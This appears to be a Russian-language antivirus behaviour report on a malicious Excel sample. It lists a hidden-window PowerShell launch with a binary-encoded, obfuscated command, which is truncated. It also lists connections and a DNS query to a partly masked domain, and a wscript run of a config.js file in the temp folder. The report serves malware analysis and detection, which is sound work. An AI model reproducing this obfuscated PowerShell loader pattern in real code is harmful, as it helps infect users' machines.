Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111...
- <Текущая директория>\99221000
- <PATH_SAMPLE>.xls
- 'my###dors.me':80
- 'my###dors.me':443
- 'my###dors.me':443
- DNS ASK my###dors.me
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111...' (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%TEMP%\config.js"